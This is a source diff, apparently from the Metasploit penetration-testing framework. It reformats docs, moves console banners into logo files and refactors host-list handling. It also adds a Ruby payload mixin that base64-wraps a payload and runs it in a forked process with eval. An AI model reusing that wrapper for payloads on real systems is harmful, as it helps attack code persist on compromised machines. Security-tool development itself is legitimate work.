@ -63,12 +62,12 @@ module Msf::Payload::Java
|
|||
end
|
||||
|
||||
#
|
||||
# Like #generate_jar, this method is used by stagers to create a war file
|
||||
# Like {#generate_jar}, this method is used by stagers to create a war file
|
||||
# as a Rex::Zip::Jar object.
|
||||
#
|
||||
# +opts+ can include:
|
||||
# +:app_name+:: the name of the \<servlet-name> attribute in the web.xml.
|
||||
# Defaults to "NAME"
|
||||
# @param opts [Hash]
|
||||
# @option :app_name [String] Name of the \<servlet-name> attribute in the
|
||||
# web.xml. Defaults to random
|
||||
#
|
||||
def generate_war(opts={})
|
||||
raise if not respond_to? :config
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'msf/core'
|
||||
|
||||
module Msf::Payload::Ruby
|
||||
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
# Since space restrictions aren't really a problem, default this to
|
||||
# true.
|
||||
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def prepends(buf)
|
||||
if datastore['PrependFork']
|
||||
buf = %Q^
|
||||
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
|
||||
if RUBY_PLATFORM =~ /mswin|mingw|win32/
|
||||
inp = IO.popen(%(ruby), %(wb)) rescue nil
|
||||
if inp
|
||||
inp.write(code)
|
||||
inp.close
|
||||
end
|
||||
else
|
||||
if ! Process.fork()
|
||||
eval(code) rescue nil
|
||||
end
|
||||
end
|
||||
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
end
|
|
@ -274,7 +274,7 @@ module Msf::Post::File
|
|||
end
|
||||
|
||||
#
|
||||
# Read a local file +local+ and write it as +remote+ on the remote file
|
||||
# Read a local file +local+ and write it as +remote+ on the remote file
|
||||
# system
|
||||
#
|
||||
def upload_file(remote, local)
|
||||
|
@ -304,7 +304,7 @@ module Msf::Post::File
|
|||
#
|
||||
def rename_file(new_file, old_file)
|
||||
#TODO: this is not ideal as the file contents are sent to meterp server and back to the client
|
||||
write_file(new_file, read_file(old_file))
|
||||
write_file(new_file, read_file(old_file))
|
||||
rm_f(old_file)
|
||||
end
|
||||
alias :move_file :rename_file
|
||||
|
@ -315,7 +315,7 @@ protected
|
|||
# Meterpreter-specific file read. Returns contents of remote file
|
||||
# +file_name+ as a String or nil if there was an error
|
||||
#
|
||||
# You should never call this method directly. Instead, call #read_file
|
||||
# You should never call this method directly. Instead, call {#read_file}
|
||||
# which will call this if it is appropriate for the given session.
|
||||
#
|
||||
def _read_file_meterpreter(file_name)
|
||||
|
|
|
@ -10,301 +10,52 @@ module Ui
|
|||
module Banner
|
||||
|
||||
Logos =
|
||||
[
|
||||
%Q{
|
||||
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
|
||||
|
||||
Trace program: running
|
||||
|
||||
wake up, Neo...
|
||||
%bldthe matrix has you%clr
|
||||
follow the white rabbit.
|
||||
|
||||
knock, knock, Neo.
|
||||
|
||||
(`. ,-,
|
||||
` `. ,;' /
|
||||
`. ,'/ .'
|
||||
`. X /.'
|
||||
.-;--''--.._` ` (
|
||||
.' / `
|
||||
, ` ' Q '
|
||||
, , `._ \\
|
||||
,.| ' `-.;_'
|
||||
: . ` ; ` ` --,.._;
|
||||
' ` , ) .'
|
||||
`._ , ' /_
|
||||
; ,''-,;' ``-
|
||||
``-..__``--`
|
||||
%clr},
|
||||
|
||||
%Q{%whi
|
||||
_---------.
|
||||
.' ####### ;."
|
||||
.---,. ;@ @@`; .---,..
|
||||
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
|
||||
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
|
||||
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
|
||||
"--'.@@@ -.@ @ ,'- .'--"
|
||||
".@' ; @ @ `. ;'
|
||||
|@@@@ @@@ @ .
|
||||
' @@@ @@ @@ ,
|
||||
`.@@@@ @@ .
|
||||
',@@ @ ; _____________
|
||||
( 3 C ) /|___ / Metasploit! \\
|
||||
;@'. __*__,." \\|--- \\_____________/
|
||||
'(.,...."/
|
||||
%clr},
|
||||
'
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
|
||||
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
|
||||
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
|
||||
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
|
||||
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
',
|
||||
'
|
||||
_ _
|
||||
/ \ /\ __ _ __ /_/ __
|
||||
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
|
||||
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|
||||
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|
||||
|/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\
|
||||
',
|
||||
%Q{
|
||||
%whiIIIIII %reddTb.dTb%clr _.---._
|
||||
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
|
||||
%whi II %red6. .P%clr : .' / | \ `. :
|
||||
%whi II %red'T;. .;P'%clr '.' / | \ `.'
|
||||
%whi II %red'T; ;P'%clr `. / | \ .'
|
||||
%whiIIIIII %red'YvP'%clr `-.__|__.-'
|
||||
|
||||
I love shells --egypt
|
||||
},
|
||||
'
|
||||
, ,
|
||||
/ \
|
||||
((__---,,,---__))
|
||||
(_) O O (_)_________
|
||||
\ _ / |\
|
||||
o_o \ M S F | \
|
||||
\ _____ | *
|
||||
||| WW|||
|
||||
||| |||
|
||||
',
|
||||
'
|
||||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
||||
',
|
||||
|
||||
|
||||
'%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld3Kom SuperHack II Logon%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| User Name: [ %redsecurity%clr ] |
|
||||
| |
|
||||
| Password: [ ] |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| %bld[ OK ]%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
|______________________________________________________________________________|
|
||||
%clr
|
||||
',
|
||||
|
||||
|
||||
'%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr %yel/%clr + %yel/%clr
|
||||
%yel\%clr + %yel/%clr %yel/%clr
|
||||
* %yel/%clr %yel/%clr
|
||||
%yel/%clr . %yel/%clr
|
||||
X %yel/%clr %yel/%clr X
|
||||
%yel/%clr %red###%clr
|
||||
%yel/%clr %red# %bld%%clr%red #%clr
|
||||
%yel/%clr %red###%clr
|
||||
. %yel/%clr
|
||||
. %yel/%clr . %red*%clr .
|
||||
%yel/%clr
|
||||
*
|
||||
+ %red*%clr
|
||||
|
||||
%bld^%clr
|
||||
#### __ __ __ ####### __ __ __ ####
|
||||
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
%clr
|
||||
',
|
||||
|
||||
|
||||
'
|
||||
%clr%whi
|
||||
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
|
||||
EFLAGS: 00010046
|
||||
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
|
||||
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
|
||||
ds: 0018 es: 0018 ss: 0018
|
||||
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
|
||||
|
||||
%bld
|
||||
Stack: 90909090990909090990909090
|
||||
90909090990909090990909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.09090900
|
||||
90909090.90909090.09090900
|
||||
..........................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
ccccccccc.................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
.................ccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
..........................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
%clr
|
||||
|
||||
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
|
||||
Aiee, Killing Interrupt handler
|
||||
%redKernel panic: Attempted to kill the idle task!
|
||||
In swapper task - not syncing
|
||||
%clr
|
||||
',
|
||||
'
|
||||
%clr
|
||||
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
|
||||
%bluMMMMMMMMMMM MMMMMMMMMM%clr
|
||||
%bluMMMN$ vMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
|
||||
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
|
||||
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
|
||||
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
|
||||
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
|
||||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||
%clr
|
||||
',
|
||||
'
|
||||
%clr ######## #
|
||||
################# #
|
||||
###################### #
|
||||
######################### #
|
||||
############################
|
||||
##############################
|
||||
###############################
|
||||
###############################
|
||||
##############################
|
||||
# ######## #
|
||||
%red##%clr %red###%clr #### ##
|
||||
### ###
|
||||
#### ###
|
||||
#### ########## ####
|
||||
####################### ####
|
||||
#################### ####
|
||||
################## ####
|
||||
############ ##
|
||||
######## ###
|
||||
######### #####
|
||||
############ ######
|
||||
######## #########
|
||||
##### ########
|
||||
### #########
|
||||
###### ############
|
||||
#######################
|
||||
# # ### # # ##
|
||||
########################
|
||||
## ## ## ##
|
||||
%clr
|
||||
',
|
||||
%Q{
|
||||
%whi+-------------------------------------------------------+
|
||||
%whi| METASPLOIT by Rapid7 |
|
||||
%whi+---------------------------+---------------------------+
|
||||
%whi| %blu__________________ %whi| |
|
||||
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi|
|
||||
%whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|______________________\\ %whi|
|
||||
%whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn********************* %whi|
|
||||
%whi+---------------------------+---------------------------+
|
||||
%whi| o O o | %yel\\'\\/\\/\\/'/ %whi|
|
||||
%whi| o O | %yel)%whi======%yel( %whi|
|
||||
%whi| o | %yel.' %whiLOOT %yel'. %whi|
|
||||
%whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi|
|
||||
%whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi|
|
||||
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
|
||||
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
|
||||
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
|
||||
%whi+---------------------------+---------------------------+%clr
|
||||
%clr
|
||||
},]
|
||||
|
||||
|
||||
|
||||
%w{
|
||||
wake-up-neo.txt
|
||||
cow-head.txt
|
||||
r7-metasploit.txt
|
||||
figlet.txt
|
||||
i-heart-shells.txt
|
||||
branded-longhorn.txt
|
||||
cowsay.txt
|
||||
3kom-superhack.txt
|
||||
missile-command.txt
|
||||
null-pointer-deref.txt
|
||||
metasploit-shield.txt
|
||||
ninja.txt
|
||||
workflow.txt
|
||||
}
|
||||
|
||||
#
|
||||
# Returns a random metasploit logo.
|
||||
#
|
||||
|
||||
def self.readfile(fname)
|
||||
base = File.expand_path(File.dirname(__FILE__))
|
||||
pathname = File.join(base, "logos", fname)
|
||||
fdata = "<< Missing banner: #{fname} >>"
|
||||
begin
|
||||
raise ArgumentError unless File.readable?(pathname)
|
||||
raise ArgumentError unless File.stat(pathname).size < 4096
|
||||
fdata = File.open(pathname) {|f| f.read f.stat.size}
|
||||
rescue SystemCallError, ArgumentError
|
||||
nil
|
||||
end
|
||||
return fdata
|
||||
end
|
||||
|
||||
def self.to_s
|
||||
if ENV['GOCOW']
|
||||
case rand(2)
|
||||
case rand(3)
|
||||
when 0
|
||||
Logos[1]
|
||||
self.readfile Logos[1]
|
||||
when 1
|
||||
Logos[5]
|
||||
self.readfile Logos[5]
|
||||
when 2
|
||||
self.readfile Logos[6]
|
||||
end
|
||||
else
|
||||
Logos[rand(Logos.length)]
|
||||
self.readfile Logos[rand(Logos.length)]
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -205,6 +205,7 @@ class Db
|
|||
mode = :search
|
||||
delete_count = 0
|
||||
|
||||
rhosts = []
|
||||
host_ranges = []
|
||||
search_term = nil
|
||||
|
||||
|
@ -241,7 +242,6 @@ class Db
|
|||
output = args.shift
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
|
||||
|
@ -280,11 +280,6 @@ class Db
|
|||
range.each do |address|
|
||||
host = framework.db.find_or_create_host(:host => address)
|
||||
print_status("Time: #{host.created_at} Host: host=#{host.address}")
|
||||
if set_rhosts
|
||||
# only unique addresses
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
end
|
||||
end
|
||||
end
|
||||
return
|
||||
|
@ -323,7 +318,7 @@ class Db
|
|||
tbl << columns
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
if mode == :delete
|
||||
host.destroy
|
||||
|
@ -344,9 +339,11 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status("Deleted #{delete_count} hosts") if delete_count > 0
|
||||
}
|
||||
##
|
||||
##
|
||||
end
|
||||
|
||||
def cmd_services_help
|
||||
|
@ -366,10 +363,11 @@ class Db
|
|||
default_columns = ::Mdm::Service.column_names.sort
|
||||
default_columns.delete_if {|v| (v[-2,2] == "id")}
|
||||
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
rhosts = []
|
||||
delete_count = 0
|
||||
search_term = nil
|
||||
search_term = nil
|
||||
|
||||
# option parsing
|
||||
while (arg = args.shift)
|
||||
|
@ -420,7 +418,6 @@ class Db
|
|||
output_file = ::File.expand_path(output_file)
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
|
||||
|
@ -508,7 +505,7 @@ class Db
|
|||
tbl << columns
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
|
||||
if (mode == :delete)
|
||||
|
@ -529,7 +526,7 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status("Deleted #{delete_count} services") if delete_count > 0
|
||||
|
||||
}
|
||||
|
@ -680,6 +677,7 @@ class Db
|
|||
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
rhosts = []
|
||||
svcs = []
|
||||
search_term = nil
|
||||
|
||||
|
@ -733,7 +731,6 @@ class Db
|
|||
end
|
||||
when "-R"
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
when "-u","--user"
|
||||
|
@ -828,7 +825,7 @@ class Db
|
|||
end
|
||||
if set_rhosts
|
||||
addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
creds_returned += 1
|
||||
end
|
||||
|
@ -842,7 +839,7 @@ class Db
|
|||
print_status("Wrote services to #{output_file}")
|
||||
end
|
||||
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
|
||||
}
|
||||
end
|
||||
|
@ -873,6 +870,7 @@ class Db
|
|||
set_rhosts = false
|
||||
|
||||
host_ranges = []
|
||||
rhosts = []
|
||||
search_term = nil
|
||||
|
||||
while (arg = args.shift)
|
||||
|
@ -896,7 +894,6 @@ class Db
|
|||
types = typelist.strip().split(",")
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
when '-h','--help'
|
||||
|
@ -954,7 +951,7 @@ class Db
|
|||
msg << " host=#{note.host.address}"
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
end
|
||||
if (note.service)
|
||||
|
@ -971,7 +968,7 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
|
||||
print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
|
||||
}
|
||||
|
@ -1476,7 +1473,7 @@ class Db
|
|||
print_error("The database is not connected")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Purging and rebuilding the module cache in the background...")
|
||||
framework.threads.spawn("ModuleCacheRebuild", true) do
|
||||
framework.db.purge_all_module_details
|
||||
|
@ -1707,4 +1704,3 @@ end
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld3Kom SuperHack II Logon%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| User Name: [ %redsecurity%clr ] |
|
||||
| |
|
||||
| Password: [ ] |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| %bld[ OK ]%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| http://metasploit.pro |
|
||||
|______________________________________________________________________________|%clr
|
|
@ -0,0 +1,9 @@
|
|||
, ,
|
||||
/ \
|
||||
((__---,,,---__))
|
||||
(_) O O (_)_________
|
||||
\ _ / |\
|
||||
o_o \ M S F | \
|
||||
\ _____ | *
|
||||
||| WW|||
|
||||
||| |||
|
|
@ -0,0 +1,16 @@
|
|||
%whi
|
||||
_---------.
|
||||
.' ####### ;."
|
||||
.---,. ;@ @@`; .---,..
|
||||
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
|
||||
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
|
||||
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
|
||||
"--'.@@@ -.@ @ ,'- .'--"
|
||||
".@' ; @ @ `. ;'
|
||||
|@@@@ @@@ @ .
|
||||
' @@@ @@ @@ ,
|
||||
`.@@@@ @@ .
|
||||
',@@ @ ; _____________
|
||||
( 3 C ) /|___ / Metasploit! \
|
||||
;@'. __*__,." \|--- \_____________/
|
||||
'(.,...."/%clr
|
|
@ -0,0 +1,8 @@
|
|||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
|
@ -0,0 +1,6 @@
|
|||
_ _
|
||||
/ \ /\ __ _ __ /_/ __
|
||||
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
|
||||
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|
||||
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|
||||
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
|
|
@ -0,0 +1,8 @@
|
|||
%whiIIIIII %reddTb.dTb%clr _.---._
|
||||
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
|
||||
%whi II %red6. .P%clr : .' / | \ `. :
|
||||
%whi II %red'T;. .;P'%clr '.' / | \ `.'
|
||||
%whi II %red'T; ;P'%clr `. / | \ .'
|
||||
%whiIIIIII %red'YvP'%clr `-.__|__.-'
|
||||
|
||||
I love shells --egypt
|
|
@ -0,0 +1,21 @@
|
|||
%clr
|
||||
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
|
||||
%bluMMMMMMMMMMM MMMMMMMMMM%clr
|
||||
%bluMMMN$ vMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
|
||||
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
|
||||
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
|
||||
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
|
||||
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
|
||||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||
%clr%bld http://metasploit.pro
|
|
@ -0,0 +1,30 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr %yel/%clr + %yel/%clr
|
||||
%yel\%clr + %yel/%clr %yel/%clr
|
||||
* %yel/%clr %yel/%clr
|
||||
%yel/%clr . %yel/%clr
|
||||
X %yel/%clr %yel/%clr X
|
||||
%yel/%clr %red###%clr
|
||||
%yel/%clr %red# %bld%%clr%red #%clr
|
||||
%yel/%clr %red###%clr
|
||||
. %yel/%clr
|
||||
. %yel/%clr . %red*%clr .
|
||||
%yel/%clr
|
||||
*
|
||||
+ %red*%clr
|
||||
|
||||
%bld^%clr
|
||||
#### __ __ __ ####### __ __ __ ####
|
||||
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
http://metasploit.pro%clr
|
|
@ -0,0 +1,30 @@
|
|||
%clr ######## #
|
||||
################# #
|
||||
###################### #
|
||||
######################### #
|
||||
############################
|
||||
##############################
|
||||
###############################
|
||||
###############################
|
||||
##############################
|
||||
# ######## #
|
||||
%red##%clr %red###%clr #### ##
|
||||
### ###
|
||||
#### ###
|
||||
#### ########## ####
|
||||
####################### ####
|
||||
#################### ####
|
||||
################## ####
|
||||
############ ##
|
||||
######## ###
|
||||
######### #####
|
||||
############ ######
|
||||
######## #########
|
||||
##### ########
|
||||
### #########
|
||||
###### ############
|
||||
#######################
|
||||
# # ### # # ##
|
||||
########################
|
||||
## ## ## ##
|
||||
http://metasploit.pro%clr
|
|
@ -0,0 +1,37 @@
|
|||
%clr%whi
|
||||
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
|
||||
EFLAGS: 00010046
|
||||
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
|
||||
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
|
||||
ds: 0018 es: 0018 ss: 0018
|
||||
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
|
||||
|
||||
%bld
|
||||
Stack: 90909090990909090990909090
|
||||
90909090990909090990909090
|
||||
90909090.90909090.90909090
